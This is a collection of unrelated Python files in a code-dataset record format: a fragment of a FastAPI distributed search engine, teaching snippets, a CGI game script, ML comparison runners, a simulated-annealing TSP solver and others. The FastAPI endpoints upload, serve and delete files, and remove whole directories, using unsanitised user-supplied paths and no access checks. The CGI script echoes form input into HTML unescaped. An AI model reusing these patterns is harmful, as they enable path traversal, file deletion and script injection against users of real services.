3ER IF\")\n r = None\n # Busca si se cae el de atras\n try:\n r = requests.get(f\"http://{node.predecessor[1].ip}:{node.predecessor[1].port}/\")\n except Exception as e:\n print(e)\n # Si se cae el de atras\n if not r or not r.ok:\n # Agrega al conjunto del actual el contenido que tenias del de atras que estaba replicado en ti\n content = node.merge()\n # Este nuevo contenido pasaselo a tu sucesor si es q no ha cambiado, si cambio, pasale el nuevo contenido mas\n # el tuyo\n node.make_replication(next_id, next_address, content)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 3\")\n # NO HACE FALTA ANALIZAR EL CASO DE QUE SE CAYO MI ANTECESOR PQ YA SE INCLUYE CUANDO SE ANALIZA EL CASO CAUNDO SE CAE MI SUCESOR\n replication_files2(next_id, next_address, False)\n # TODO: FixBug TypeError: 'NoneType' object does not support item assignment\n print_debug(\"Predecessors\" + str(node.predecessor))\n node.restart_pred_data_info(node.predecessor[0])\n # else:\n # Si aun no se tiene predecesor, esperamos a que el venga a buscarnos\n\n # TODO: Agregar rutina de FixFinger para que se ejecute a cada rato\n # node.recomputeFingerTable() #-\n print(\"FT\", node.FT)\n # print('FT[','%04d'%node.nodeID,']: ',['%04d' % k for k in 
node.FT]) #- \n\n print_info(node)\n print_info(\"get_predecessor method: \"+str(node.get_predecessor()))\n # Si es lider entonces:\n # Check for other leaders or nodes on the network\n # Discovering\n if not discover_timeout and node.is_leader:\n node.discover()\n print_log(f\"Leaders List: {node.leaders_list}\")\n # Update discover_timeout: Iteraciones requeridas para verificar quienes estan en la red,\n # asi como los que se hayan unido nuevos. Se utiliza para estar atentos a cuando:\n # se unan o desconecten redes.\n if discover_timeout <= 0:\n discover_timeout = 3\n\n discover_timeout -= 1\n print_log(f\"Discover Timeout: {discover_timeout}\")\n # Reccess\n print(f\"On Thread...Sleeping for {TIMEOUT} seconds\")\n time.sleep(TIMEOUT)\n except KeyboardInterrupt as e:\n print(\"Stopping Chord Routine Thread...\")\n stopped = True\n\ndef check_alive():\n stopped = False\n try:\n while not stopped:\n if node.is_leader and datetime.datetime.now().time().second/30 == 0:\n # print(node.clock)\n # print(\"-------------------------------Check alive-----------------------------\")\n node.check_live_nodes()\n # time.sleep(10)\n except KeyboardInterrupt as e:\n stopped = True\n\n\n# Uploading Files\nfrom fastapi import APIRouter, UploadFile, File, Form\nfrom fastapi.responses import FileResponse, JSONResponse\nfrom os import getcwd, remove\nfrom shutil import rmtree\n\nrouter = APIRouter()\n\n\n@router.post(\"/upload\")\nasync def upload_file(file: UploadFile = File(...)):\n with open(getcwd() + \"/txts/\" + file.filename, \"wb\") as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n return \"success\"\n\n\n@router.get(\"/file/{name_file}\")\ndef get_file(name_file: str):\n return FileResponse(getcwd() + \"/downloads\" + name_file)\n\n# Cliente\n# Metodo para que el cliente le pida un archivo a traves de una url al servidor con el que se esta comunicando\n@router.get(\"/download/{number}\")\ndef download_file(number: str):\n print(\"ENTRO EN DOWNLOAD FILE\")\n print(\"number \", number)\n file_name = \"document_\" +number +\".txt\"\n response = find_download(number) # VA A BUSCAR SI EL CURRENT SERVER TIENE EL ARCHIVO\n print(\"type(response) = \",type(response))\n print(\"type(response) == bool \", type(response) == bool)\n if type(response) == bool: #SI NO SE ENCONTRO EL ARCHIVO\n response = search_to_download(number) # SE LO PIDE A LOS DEMAS SERVERS\n if response is None:\n response = {\"error\": f\"File '{file_name}' not found in the database.\"}\n \n print(\"response in download_file \", response)\n \n file_response = FileResponse(response[0], media_type=\"application/octet-stream\", filename=response[1])\n print(\"type(file_response) \", type(file_response))\n return file_response \n\ndef find_download(number:str):\n print(\"ENTRO EN FIND DOWNLOAD\")\n print(\"number \", number)\n file_name = \"document_\" +number +\".txt\"\n file_path = Path(os.path.join(PATH_TXTS,file_name))\n\n print(\"file_path \", file_path)\n if not file_path.exists(): #Comprueba si el archivo existe en la carpeta txts\n return {\"error\": f\"File '{file_name}' not found in the folder.\"}\n \n #Comprobar si el archivo esta en la base de datos del servidor\n result_ID = check_database(number)\n print(\"len(result_ID)=\",len(result_ID))\n if len(result_ID) > 0:\n response = [file_path,file_name]\n else:\n response = False\n print(\"response en FIND DOWNLOAD \", response)\n return response\n\n\n# Server\n@router.get(\"/api/download/{number}\")\ndef download_file_api(number: str):\n 
print(\"ENTRO EN API DOWNLOAD\")\n return find_download(number)\n \n #return FileResponse(getcwd() + \"/downloads\" + \"/\"+filename, media_type=\"application/octet-stream\", filename=filename)\n\n@router.delete(\"/delete/{name_file}\")\ndef delete_file(name_file: str):\n try:\n remove(getcwd() + \"/\" + name_file)\n return JSONResponse(content={\n \"removed\": True\n }, status_code=200)\n except FileNotFoundError:\n return JSONResponse(content={\n \"removed\": False,\n \"message\": \"File not found\"\n }, status_code=404)\n\n\n@router.delete(\"/folder\")\ndef delete_file(folder_name: str = Form(...)):\n rmtree(getcwd() + folder_name)\n return JSONResponse(content={\n \"removed\": True\n }, status_code=200)\n\napp.include_router(router)\nprint(\"EMPEZAMOS\")\ninit_servers(database, name_db)\n#redistribute_data(database)","repo_name":"Krtucho/distributed_search_engine","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":57544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27662476777","text":"'''\nUna pila (stack en inglés) es una lista ordenada o estructura de datos\nque permite almacenar y recuperar datos, siendo el modo de acceso a sus\nelementos de tipo LIFO (del inglés Last In, First Out, \n«último en entrar, primero en salir»)\n\nLas operaciones de una pila son insertar y quitar.\nInsertar (push) añade un elemento a la pila.\nQuitar (pop) elimina o saca un elementos de la pila.\nVeamos un ejemplo de LIFO: último en entrar, primero en salir\n'''\npila=[]\npila.append(\"T\")\npila.append(\"E\")\npila.append(\"C\")\npila.insert(len(pila),\"A\") #<==ESta instruccion seria el equivalente al PUSH\nprint(pila)\n\nc = pila.pop()\nprint(c)\nc = pila.pop()\nprint(c)\nc = pila.pop()\nprint(c)","repo_name":"fedemtzesc/curso-python","sub_path":"curso/pilas.py","file_name":"pilas.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11772748998","text":"\"\"\"A setuptools based setup module.\"\"\"\nfrom os import path\nfrom setuptools import setup, find_packages\nfrom io import open\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='fantasy-analytics',\n version='0.0.1',\n description='ESPN Fantasy Basketball Analytics Platform',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/themarathoncontinues/fantasy-analytics',\n author='Mitchell Bregman, Leon Kozlowski',\n author_email='mitchbregs@gmail.com, leonkozlowski@gmail.com',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'Programming Language :: Python :: 3.6'\n ],\n keywords='Fantasy Basketball Analytics',\n packages=find_packages(),\n install_requires=[\n 'celery',\n 'flask',\n 'mock',\n 'prefect',\n 'prefect[postgres]',\n 'prefect[viz]',\n 'pytest',\n 'pytest-cov',\n 'python-dotenv',\n 'requests',\n ]\n)\n","repo_name":"themarathoncontinues/fantasy-analytics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2281248018","text":"#!/usr/bin/env python3\nimport sys\nimport csv\nimport cgi\n\ndef 
main():\n\tform=cgi.FieldStorage()\n\tinventory=form[\"inventory\"].value\n\tURL=form[\"URL\"].value # URL of the player's room\n\n\tint_list=[]\n\tfile1=open(\"./resources.csv\", \"r\")\n\t# parse the contents of resources.csv into a list\n\tint_list=file1.read().split(',')\n\tint_list[2]=int_list[2].rstrip() # strip the trailing newline from the last field\n\tint_list[0]=str(int(int_list[0]) - 1) # one fewer resource remaining\n\tfile1.close()\n\n\topen(\"./resources.csv\",\"w\").close() # truncate the csv file\n\n\tfile3=open(\"./resources.csv\",\"w\") # rewrite the csv file\n\tfile3writer = csv.writer(file3, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\tfile3writer.writerow([int_list[0]+\",\"+int_list[1]+\",\"+\"0\"]) # replacing the occupied status with 0\n\tfile3.close()\n\n\tprint (\"Content-type: text/html\\n\\n\")\n\tprint (\"\"\"\n    <html>\n    <body>\n    You may proceed to the next room.\n    <br>\n    <a href=\"%s\">Continue</a>\n    <p>Inventory: %s</p>\n    </body>\n    </html>
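\n    <!-- the two %s placeholders above are filled from (URL, inventory) in the format call below -->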
\n \"\"\" % (URL,inventory))\n\nmain()\n\n","repo_name":"TuOfTimes/TheBlueRoom","sub_path":"Room/success.py","file_name":"success.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13447179776","text":"\nfrom operator import truediv\nfrom Entorno.Retorno import Retorno, Tipos\nfrom AST.Instruccion.Statement import Statement\nfrom AST.Expresion.Expresion import Expresion\nfrom Entorno.TablaSimbolos import TablaSimbolos\nfrom AST.misc.Program import Program\nfrom AST.Instruccion.Instruccion import Instruccion\nfrom AST.Instruccion.Case import Case\nfrom Entorno.Retorno import Tipos\nfrom AST.misc.error import Error_\nfrom Generador import Generador\nfrom AST.misc.Display_obj import Display_obj\n\nclass Match(Instruccion):\n\n def __init__(self, condicion: Expresion, case_list, default, linea, columna):\n self.condicion = condicion\n self.case_list = case_list\n self.default = default\n self.linea = linea\n self.columna = columna\n\n\n def ejecutar3D(self, ts) -> Retorno:\n \n ts_local = TablaSimbolos(ts, \"MATCH\")\n ts_local.Display = ts.Display\n ts_local.ptr = ts.ptr\n ts_local.tamanio = ts.tamanio\n \n ETQ_SALIDA = Generador.obtenerEtiqueta()\n \n DISPLAY = Display_obj()\n DISPLAY.salida = ETQ_SALIDA\n ts.ptr += 1\n ts.Display[ts.ptr] = DISPLAY\n \n condicion = self.condicion.obtener3D(ts)\n # cond_temp = Generador.obtenerTemporal()\n \n SALIDA = \"/* INSTRUCCION MATCH */\\n\"\n SALIDA += condicion.codigo\n \n \n for case in self.case_list:\n found_etq = Generador.obtenerEtiqueta()\n next_etq = Generador.obtenerEtiqueta()\n \n SALIDA += \"/* CASE */\\n\"\n \n for exp in case.lista_exp:\n valor = exp.obtener3D(ts_local)\n SALIDA += valor.codigo\n SALIDA += f'if ( {condicion.temporal} == {valor.temporal}) goto {found_etq}; \\n'\n \n SALIDA += f'goto {next_etq};\\n'\n\n SALIDA += f'{found_etq}:\\n'\n SALIDA += case.codigo.ejecutar3D(ts_local)\n SALIDA += f'goto {ETQ_SALIDA};\\n'\n \n SALIDA += f'{next_etq}:\\n'\n\n if self.default is not None:\n SALIDA += \"/* DEFAULT */\\n\"\n SALIDA += self.default.ejecutar3D(ts_local)\n \n \n SALIDA += f'{ETQ_SALIDA}:\\n'\n \n return SALIDA\n \n \n \n \n \n ","repo_name":"Desquivel501/OLC2_Proyecto2_202010055","sub_path":"api/AST/Instruccion/Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44737068727","text":"import mock_github\n\nfrom base import MockPyGithubTests\nfrom lgtm import git\n\n\nclass GitTests(MockPyGithubTests):\n\n def test_get_team_members(self):\n mock_github.create_fake_org(teams=[mock_github.MockTeam('team1', ['bat', 'baz'])])\n git_hub = git.GitHub('foo', 'bar', 'bat')\n self.assertEquals(git_hub.get_team_members('OrgName/team1'), ['bat', 'baz'])\n\n def test_expand_teams(self):\n mock_github.create_fake_org(teams=[mock_github.MockTeam('team1', ['bat', 'baz'])])\n git_hub = git.GitHub('foo', 'bar', 'bat')\n self.assertEquals(\n sorted(git_hub.expand_teams(['foo', 'OrgName/team1'])),\n sorted(['foo', 'bat', 'baz']))\n","repo_name":"NerdWalletOSS/github-lgtm","sub_path":"lgtm/tests/test_git.py","file_name":"test_git.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23134569242","text":"import fire\nimport torch\nimport numpy as np\n\nfrom torch.utils import data\nfrom torchvision import datasets, 
transforms\nfrom typing import Tuple, Dict, Callable\nfrom pathlib import Path\n\nfrom torch_harness import TorchHarness\nfrom baseline_models import ReLUNet, TanhNet, MaxoutNet\nfrom dilation_erosion import DenMoNet\n\ndata_dir = Path(__file__).parent / 'data'\nmodel_dir = Path(__file__).parent / 'models'\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\n# Datasets\n\ndef load_cifar10() -> Tuple[data.Dataset, data.Dataset, int]:\n    \"\"\"Load CIFAR-10 train, test, and size.\"\"\"\n    trans = transforms.Compose([transforms.ToTensor()])\n    train_set = datasets.CIFAR10(str(data_dir), train=True, download=True, transform=trans)\n    test_set = datasets.CIFAR10(str(data_dir), train=False, download=True, transform=trans)\n    return train_set, test_set, 32 * 32 * 3\n\n\ndef load_fashion_mnist() -> Tuple[data.Dataset, data.Dataset, int]:\n    \"\"\"Load fashion MNIST train, test, and size.\"\"\"\n    trans = transforms.Compose([transforms.ToTensor()])\n    train_set = datasets.FashionMNIST(str(data_dir), train=True, download=True, transform=trans)\n    test_set = datasets.FashionMNIST(str(data_dir), train=False, download=True, transform=trans)\n    return train_set, test_set, 28 * 28\n\n\ndef load_mnist() -> Tuple[data.Dataset, data.Dataset, int]:\n    \"\"\"Load MNIST train, test, and size.\"\"\"\n    trans = transforms.Compose([transforms.ToTensor()])\n    train_set = datasets.MNIST(str(data_dir), train=True, download=True, transform=trans)\n    test_set = datasets.MNIST(str(data_dir), train=False, download=True, transform=trans)\n    return train_set, test_set, 28 * 28\n\n\ndef load_circles() -> Tuple[data.Dataset, data.Dataset, int]:\n    \"\"\"Load circles train, test, and size.\"\"\"\n    training = np.load('data/circle_training.npy')\n    test = np.load('data/circle_test.npy')\n    train_set = data.TensorDataset(\n        torch.FloatTensor(training[:, :-1]),\n        torch.LongTensor(training[:, -1])\n    )\n\n    test_set = data.TensorDataset(\n        torch.FloatTensor(test[:, :-1]),\n        torch.LongTensor(test[:, -1])\n    )\n\n    return train_set, test_set, 2\n\n\ndef load_squares() -> Tuple[data.Dataset, data.Dataset, int]:\n    \"\"\"Load squares train, test, and size.\"\"\"\n    # Note: train and test share the same arrays here, so test accuracy on\n    # this dataset measures fit rather than generalization.\n    x = np.load('data/coordinates/squares_features.npy')\n    y = np.load('data/coordinates/squares_labels.npy')\n    train_set = data.TensorDataset(torch.from_numpy(x).float(), torch.from_numpy(y).long())\n    test_set = data.TensorDataset(torch.from_numpy(x).float(), torch.from_numpy(y).long())\n    return train_set, test_set, 2\n\n\ndataset_map: Dict[str, Callable] = {\n    \"cifar10\": load_cifar10,\n    \"fashion_mnist\": load_fashion_mnist,\n    \"mnist\": load_mnist,\n    \"circles\": load_circles,\n    \"squares\": load_squares\n}\n\n# Models\n\nbaseline_model_map: Dict[str, Callable] = {\n    'relu': ReLUNet,\n    'tanh': TanhNet,\n    'maxout': MaxoutNet\n}\n\n\ndef run_and_save_model(model, train, test, epochs, name):\n    harness = TorchHarness(model, model.name(name), train, test, epochs=epochs)\n    harness.train_and_evaluate()\n    model.store(name, model_dir)\n\n\n# Runners\n\ndef run_denmo(dset_name: str, erosions: int = 5, dilations: int = 5, epochs: int = 2):\n    \"\"\"Run denmo on a dataset.\n\n    Datasets:\n    * mnist\n    * fashion_mnist\n    * cifar10\n    \"\"\"\n    train, test, size = dataset_map[dset_name]()\n    model = DenMoNet(size, dilations, erosions, 10)\n    run_and_save_model(model, train, test, epochs, dset_name)
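\n\n\n# (Added note, not from the original repo) fire.Fire() at the bottom of this file\n# exposes these runners on the command line; a hypothetical invocation could be:\n#   python comparisons.py run_denmo mnist --erosions=3 --epochs=1\n#   python comparisons.py run_baseline relu fashion_mnist\n\n\ndef run_baseline(model_name: str, dset_name: str, h_layers: int = 200, epochs: int = 2):\n    \"\"\"Run a baseline model on a dataset.\n\n    Datasets:\n    * mnist\n    * fashion_mnist\n    * cifar10\n\n    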
Models:\n * relu\n * tanh\n * maxout\n \"\"\"\n train, test, size = dataset_map[dset_name]()\n model = baseline_model_map[model_name](size, h_layers)\n run_and_save_model(model, train, test, epochs, dset_name)\n\n\ndef predict_coordinates(path: str):\n # train, test, size = dataset_map[dset_name]()\n model = torch.load(path )\n model.eval()\n features = np.load('data/coordinates/coordinates.npy')\n coordinates = torch.from_numpy(features).to(device).float()\n predictions = model(coordinates).data.cpu().numpy()\n classes = predictions.argmax(axis=1)\n\n zero_coordinates = np.where(classes == 0)[0]\n one_coordinates = np.where(classes == 1)[0]\n\n from matplotlib import pyplot as plt\n fig, ax = plt.subplots()\n ax.plot(features[zero_coordinates, 0], features[zero_coordinates, 1], linestyle='None', marker='o')\n ax.plot(features[one_coordinates, 0], features[one_coordinates, 1], linestyle='None', marker='o')\n plt.show()\n\n\nif __name__ == '__main__':\n fire.Fire()\n","repo_name":"jlebensold/iclr_2019_buffalo-3","sub_path":"comparisons.py","file_name":"comparisons.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"71345413955","text":"from online_users.models import OnlineUserActivity\nfrom accounts.models import Account\nfrom orders.models import Order\n\n\ndef admin_index_processors(request):\n user_activity_objects = OnlineUserActivity.get_user_activities()\n number_of_active_users = user_activity_objects.count()\n\n total_users = (Account.objects.count())\n\n # Generating sales report\n ind_products = 0\n transactions = 0\n product_sales = {}\n order = Order.objects.all()\n # for o in order:\n # transactions += 1\n # items = o.orderitem_set.all()\n \n # for i in items:\n # print(str(i.product))\n # if str(i.product) not in product_sales:\n # product_sales[str(i.product)] = i.quantity\n # else:\n # product_sales[str(i.product)] = product_sales[str(i.product)] + i.quantity \n\n # print((product_sales)) \n\n # Find indv product sales\n for pv in product_sales.values():\n ind_products += int(pv) \n \n\n # print(ind_products)\n # print(transactions) \n \n context = {'online_users' : number_of_active_users, \n 'total_users' : total_users, \n 'ind_products' : ind_products, \n 'transactions' : transactions\n }\n return context","repo_name":"yogesh1234567890/smartbaje","sub_path":"smartbaje/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2822387319","text":"def show(x,y): #non default argument \n print(\"x \", x)\n print(\"y \", y)\n\nshow(10,20) #positional argument \n\nshow(x = 'x', y = 'k') # keyword argument\n#show(x =20, y = 30, z = 40)\n# positonal arguments should be before keyword argument\nshow(10, y = 20) \n","repo_name":"akashgkrishnan/learningPython","sub_path":"FUNS.py","file_name":"FUNS.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13253088276","text":"import pandas as pd\nimport numpy as np\nimport random\nimport math\nimport matplotlib as plot\n\n# Show full width of dataframe\npd.set_option('display.max_colwidth', None)\npd.set_option('display.max_row', None)\n# pd.set_option('display.max_rows', None)\n\n# Converting csv to data frame and adding headers\nheaders = ['X', 'Y']\ndata = 
pd.read_csv(\"TSP-Matrix.csv\", names=[\"X\",\"Y\"])\nprint(data)\n\n############## Step 1: Initial Solution: Based on either the random or greedy start\n\n# Create a list of 1 to 24 (cities) everytime one is appended to greedy_start one is removed from the list of cities array\ncities = list(range(0, 25))\ngreedy_start = []\n\ndef randomStart():\n random_route = random.sample(range(1, 25), 24)\n print(\"Random start:\", random_route)\n\ndef greedyStart(city1,city2):\n\n global current_city\n \n # Make current city the last visited city (num2)\n current_city = city2\n # Append and remove first and second items from greedy parameter\n appendRemove(city1)\n appendRemove(city2)\n \n # We want to go through the length of not chosen city list \n while len(cities) > 0:\n # Then we want to find the next best city according to the current city we are on\n next_city = findNext(current_city)\n # Add next best city stop off to the greedy start array and then remove it from the cities list\n appendRemove(next_city)\n next_city = current_city\n \n print(\"Greedy Start:\",greedy_start)\n \n \n############## Step 2: Neighbourhood operator: Inversion operation\n\ndef randomSwap(route):\n new_route = route.copy()\n city1 = random.randint(0, 24)\n city2 = random.randint(0, 24)\n # They must not be the same city as you can't swap these\n if city1 != city2:\n new_route[city1], new_route[city2] = new_route[city2], new_route[city1]\n else: # If they are the same then go to another city\n city1 -= 1\n new_route[city1], new_route[city2] = new_route[city2], new_route[city1]\n return new_route\n\n\n############## Step 3: Solution evaluation: Add the cost of travelling through the cities\n\n# Calculates the euclidean distance between 2 points \ndef calculatePath(city1, city2):\n \n # We need to find this number from the pandas dataframe but - 1\n # Shift index by -1 because index starts from 0 not 1\n city1_index = city1 - 1\n city2_index = city2 - 1\n \n # Find position of city within the DataFrame to calculate Euclidean distance between the 2 points for X, Y\n x_sq = ((data[\"X\"].iloc[city2_index] - data[\"X\"].iloc[city1_index])) ** 2\n y_sq = ((data[\"Y\"].iloc[city2_index] - data[\"Y\"].iloc[city1_index])) ** 2\n euclidean = x_sq + y_sq\n length = math.sqrt(euclidean)\n \n return length\n\n# Calculates the cost of the entire array of path/solution using euclidean distance\n\ndef calculateRoute(route):\n cost_total = 0\n # For each city \n for key, city in enumerate(route):\n # Find the index\n if route.index(city) < 24:\n # Then count up the cost from A -> B, B -> C etc\n this_city = route[key]\n next_city = route[key+1]\n cost_total = cost_total + calculatePath(this_city, next_city)\n else:\n # Then make sure we add on the cost of the last city back to the first\n cost_total = cost_total + calculatePath(route[23], route[0])\n\n return round(cost_total, 2)\n\n\ndef findNext(current):\n # Create a temp dict for current_city > next_city and all the length values\n city_costs = {}\n # Iterate through each item in cities array\n for index, each in enumerate(cities):\n # Calculate cost from current city to each city not visited\n path_cost = calculatePath(current, each)\n # Append each of these cities and their cost to a dictionary\n city_costs[each] = path_cost\n # Convert the dictionary into items and then a list \n city_costs = city_costs.items()\n list_city = list(city_costs)\n # Convert list into a DataFrame\n city_dataframe = pd.DataFrame(list_city)\n # Give DataFrame column names\n city_dataframe.columns = 
[\"City\",\"Cost\"]\n # Pick the smallest cost\n min_cost = city_dataframe.loc[city_dataframe.Cost == city_dataframe.Cost.min(), 'City'].values[0]\n # Return the city with the minimum cost\n return min_cost\n\n \ndef appendRemove(city):\n # Every time we append a new city to new solution path we must pop it from cities array.\n greedy_start.append(city)\n cities.remove(city)\n\n############## Step 4: Stopping criteria: When temperature T reaches to Tmin. Tmax = 10.00 /Tmi n = 0.0005 / alpha = 0.995\n\n\n# Create a function with parametres current cost, new cost, temperature \ndef acceptanceProbability(current,new,temperature):\n # If the new solution is better, accept it\n currentCost = calculateRoute(current)\n newCost = calculateRoute(new)\n \n # Calculate the acceptance probability\n accepted = math.exp((currentCost - newCost) / temperature)\n return accepted\n\n\n############### CONFIGURATIONS ###############\n\n# Maximimum temperature it starts at \ncurrent_temp = 5.00\n# Minimum temperature it stops at \ntemp_min = 0.001\n# The rate of reduction\nalpha = 0.9\n# Iteration s\ntotal_iterations = 1\niteration_index = 0\ncounter = 0\n\n# Create an array with all the costs\nsolution_costs = {}\n\n\n# Setting up the greedy start solution \ngreedyStart(4,8)\ngreedy_cost = calculateRoute(greedy_start)\nprint(\"Greedy cost:\", greedy_cost)\n# Or choose randomStart() \n\nstart_route = greedy_start\nbest_route = greedy_start\n\n# while iteration is equal to or less than total iterations needed per \"temperature leve\"\nwhile iteration_index <= total_iterations: \n # Generate a new neighbour by swapping adjacent\n new_route = randomSwap(start_route)\n # Calculate cost \n current_cost = calculateRoute(best_route)\n new_route_cost = calculateRoute(new_route)\n\n # If new neighbour costs less than current best route accept that is the best route \n if new_route_cost < current_cost:\n best_route = new_route\n # print(\"FIrst pick best route\", best_route, \"Cost\", calculateRoute(best_route))\n # IF new neighbour costs more than current best route calculate the probability \n else:\n new_probability = acceptanceProbability(best_route, new_route, current_temp)\n # Generate random number between 0 and 1 \n random_number = random.uniform(0,1)\n # If random number < probability = accept move and change to best_route\n if random_number < new_probability:\n best_route = new_route\n print(\"New route best route\", best_route, \"Cost\", calculateRoute(best_route))\n\n # If we have run through all iterations\n if iteration_index == total_iterations:\n # Then we should reduce temperature\n current_temp = current_temp * alpha\n # And reset the counter \n iteration_index = 0\n # print(\"test\")\n else:\n iteration_index += 1\n # print(\"test 2\")\n counter += 1 \n print(\"Solution \" + str(counter), best_route, \"Cost:\", calculateRoute(best_route))\n \n # Append all costs to a dict\n solution_costs[counter] = calculateRoute(best_route)\n\n \n ####### STOPPING CRITERIA #######\n if current_temp < temp_min:\n break\n\nsolution_cost = solution_costs.items()\nlist_of_solutions = list(solution_cost)\n# Convert list into a DataFrame\nsolution_df = pd.DataFrame(list_of_solutions)\n# Give DataFrame column names\nsolution_df.columns = [\"Solution\",\"Cost\"]\n\nprint(\"Overall best solution:\", best_route, \"\\nCost:\", calculateRoute(best_route))\nprint(\"Total iterations:\", counter) \n\n######### Draw graphs\nsolution_df.plot.line(x=0, y=1, style='-o',marker='x', figsize=(20, 
10));\nsolution_df.plot()","repo_name":"LoveBexa/applied-ai","sub_path":"Simulated Annealing/simulated-annealing.py","file_name":"simulated-annealing.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23574521431","text":"import time\r\nimport logging\r\nfrom ortools.linear_solver import pywraplp\r\n\r\n\r\ndef solve_fashion(n, board, m):\r\n solver = pywraplp.Solver('SolveQueen',\r\n pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\r\n circles = [[] for _ in range(n)]\r\n crosses = [[] for _ in range(n)]\r\n plusses = [[] for _ in range(n)]\r\n\r\n preplaced_constraints = [None] * m\r\n pc_idx = 0\r\n objective = solver.Objective()\r\n for i in range(n):\r\n circles[i] = [None for _ in range(n)]\r\n crosses[i] = [None for _ in range(n)]\r\n plusses[i] = [None for _ in range(n)]\r\n for j in range(n):\r\n circle_value = 0\r\n if board[i][j] == 'o':\r\n circle_value = 1\r\n circles[i][j] = solver.IntVar(circle_value, 1,\r\n \"O:r\" + str(i) + \"c\" + str(j))\r\n crosses[i][j] = solver.IntVar(0, 1, \"X:r\" + str(i) + \"c\" + str(j))\r\n plusses[i][j] = solver.IntVar(0, 1, \"+:r\" + str(i) + \"c\" + str(j))\r\n if board[i][j] == 'x':\r\n preplaced_constraints[pc_idx] = solver.Constraint(1, 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(circles[i][j], 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(crosses[i][j], 1)\r\n if board[i][j] == '+':\r\n preplaced_constraints[pc_idx] = solver.Constraint(1, 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(circles[i][j], 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(plusses[i][j], 1)\r\n\r\n\r\n objective.SetCoefficient(circles[i][j], 2.001)\r\n objective.SetCoefficient(crosses[i][j], 1)\r\n objective.SetCoefficient(plusses[i][j], 1)\r\n objective.SetMaximization()\r\n\r\n row_constraints = [None] * n\r\n for i in range(0, n):\r\n row_constraints[i] = solver.Constraint(1, 1)\r\n for j in range(0, n):\r\n row_constraints[i].SetCoefficient(circles[i][j], 1)\r\n row_constraints[i].SetCoefficient(crosses[i][j], 1)\r\n\r\n col_constraints = [None] * n\r\n for i in range(0, n):\r\n col_constraints[i] = solver.Constraint(1, 1)\r\n for j in range(0, n):\r\n col_constraints[i].SetCoefficient(circles[j][i], 1)\r\n col_constraints[i].SetCoefficient(crosses[j][i], 1)\r\n\r\n inc_diag_constraints = {}\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if i + j not in inc_diag_constraints:\r\n inc_diag_constraints[i + j] = solver.Constraint(0, 1)\r\n inc_diag_constraints[i + j].SetCoefficient(circles[i][j], 1)\r\n inc_diag_constraints[i + j].SetCoefficient(plusses[i][j], 1)\r\n\r\n dec_diag_constraints = {}\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if i - j not in dec_diag_constraints:\r\n dec_diag_constraints[i - j] = solver.Constraint(0, 1)\r\n dec_diag_constraints[i - j].SetCoefficient(circles[i][j], 1)\r\n dec_diag_constraints[i - j].SetCoefficient(plusses[i][j], 1)\r\n\r\n # Solve!\r\n status = solver.Solve()\r\n if status == solver.OPTIMAL:\r\n style = 0\r\n\r\n changed = []\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n if circles[i][j].solution_value() == 1:\r\n if board[i][j] != 'o':\r\n changed.append(('o', i, j))\r\n style += 2\r\n # print('O ', end='')\r\n elif crosses[i][j].solution_value() == 1:\r\n if board[i][j] != 'x':\r\n changed.append(('x', i, j))\r\n style += 1\r\n # print('X ', end='')\r\n elif plusses[i][j].solution_value() == 1:\r\n if board[i][j] != '+':\r\n changed.append(('+', i, j))\r\n style += 
